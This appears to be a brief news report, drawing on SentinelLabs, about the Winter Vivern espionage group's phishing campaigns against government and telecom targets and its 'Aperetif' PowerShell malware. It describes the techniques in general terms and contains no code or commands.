Winter Vivern, an advanced hacking group believed to be pro-Russian, is targeting European government organizations and telecommunication service providers for espionage.
The group is said to function on limited resources, but their creativity compensates for these limitations, as per SentinelLabs. The hackers have targeted government organizations in Lithuania, Slovakia, the Vatican, and India, and more recently individuals working in the governments of Poland, Italy, Ukraine, and India.
The hackers have also targeted telecommunication companies, especially those supporting Ukraine since the Russian invasion. Recently, Winter Vivern created webpages mimicking those of Poland’s Central Bureau for Combating Cybercrime, the Ukraine Ministry of Foreign Affairs, and the Security Service of Ukraine to distribute malicious files to visitors who end up there by clicking on links in malicious emails. Winter Vivern has previously dropped spreadsheet files with malicious macros that launch PowerShell on cloned sites used by the APT.
SentinelLabs reports Winter Vivern’s resourcefulness in using Windows batch files to impersonate antivirus scanners while downloading malicious payloads.
The malware delivered through this process is named “Aperetif,” capable of automatic file scanning and exfiltration, taking screenshots, and sending all data in a base64-encoded form to a hardcoded command and control server URL. Winter Vivern has recently used a new payload similar in functionality to Aperefit, indicating that it’s a work in progress.
In both cases, the malware beacons connect to the C2 using PowerShell and wait for instructions or additional payloads.
In conclusion, Winter Vivern uses a relatively simplistic yet effective approach to lure its targets into downloading malicious files, and their low profile has helped them stay under-reported.
The hackers’ activities align with the interests of the Russian and Belarusian governments, indicating that Winter Vivern is a pro-Russian APT group.
Winter Vivern’s use of creative tactics to compensate for their limited resources and their low-profile approach makes them a significant threat to government organizations and telecommunication service providers.
